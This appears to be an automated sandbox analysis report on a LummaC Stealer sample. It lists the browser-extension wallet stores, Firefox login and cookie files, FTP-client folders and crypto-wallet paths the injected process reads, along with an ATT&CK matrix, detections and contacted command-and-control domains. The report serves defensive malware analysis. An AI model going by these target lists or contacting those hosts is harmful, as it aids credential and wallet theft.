              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: Yara matchFile source: 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1983486359.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1982657253.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1983200877.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1983911161.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1981900349.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1982913303.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1983703963.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1996190492.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1982143036.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2676, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2676, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		11
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Screen Capture              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts311
              Process Injection              		311
              Process Injection              		LSASS Memory241
              Security Software Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		Security Account Manager11
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares41
              Data from Local System              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
              Obfuscated Files or Information              		NTDS1
              Process Discovery              		Distributed Component Object Model2
              Clipboard Data              		114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing              		LSA Secrets12
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials46
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              HLZwUhcJ28.exe50%ReversingLabsWin64.Trojan.LummaStealer
              HLZwUhcJ28.exe100%AviraTR/Redcap.dcvcm

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe100%AviraTR/Redcap.tpgxx
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe83%ReversingLabsWin32.Trojan.LummaStealer
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5GuiVBox.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Security-Common.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxClient-x86.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxProxyStub-x86.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\cygwin1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libiconv-2.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libidn2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libintl-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\qsqlite.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://player.vimeo.com0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
              https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
              http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
              https://steam.tv/0%URL Reputationsafe
              http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
              https://store.steampowered.com/points/shop/0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://lv.queniujq.cn0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
              https://checkout.steampowered.com/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
              https://store.steampowered.com/;0%URL Reputationsafe
              https://store.steampowered.com/about/0%URL Reputationsafe
              https://help.steampowered.com/en/0%URL Reputationsafe
              https://store.steampowered.com/news/0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
              https://recaptcha.net/recaptcha/;0%URL Reputationsafe
              https://store.steampowered.com/stats/0%URL Reputationsafe
              https://medal.tv0%URL Reputationsafe
              https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
              https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              		104.102.49.254
              		truetrue
                		unknown
                villagedguy.cyou
                		104.21.32.196
                		truetrue
                  		unknown
                  wrigglesight.sbs
                  		unknown
                  		unknowntrue
                    		unknown
                    ferrycheatyk.sbs
                    		unknown
                    		unknowntrue
                      		unknown
                      deepymouthi.sbs
                      		unknown
                      		unknowntrue
                        		unknown
                        monstourtu.sbs
                        		unknown
                        		unknowntrue
                          		unknown
                          captaitwik.sbs
                          		unknown
                          		unknowntrue
                            		unknown
                            snailyeductyi.sbs
                            		unknown
                            		unknowntrue
                              		unknown
                              heroicmint.sbs
                              		unknown
                              		unknowntrue
                                		unknown
                                sidercotay.sbs
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  wrigglesight.sbstrue
                                    		unknown
                                    heroicmint.sbstrue
                                      		unknown
                                      ferrycheatyk.sbstrue
                                        		unknown
                                        https://steamcommunity.com/profiles/76561199724331900true
                                          		unknown
                                          deepymouthi.sbstrue
                                            		unknown
                                            sidercotay.sbstrue
                                              		unknown
                                              https://villagedguy.cyou/apitrue
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://player.vimeo.comBitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://villagedguy.cyou/apibu0BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://github.com/golang/protobuf/issues/1609):Imperial_Delay.exefalse
                                                        		unknown
                                                        https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.gstatic.cn/recaptcha/BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engliBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://github.com/zitadel/zitadel/blob/new-eventstore/cmd/zitadel/startup.yaml.Imperial_Delay.exefalse
                                                              		unknown
                                                              https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
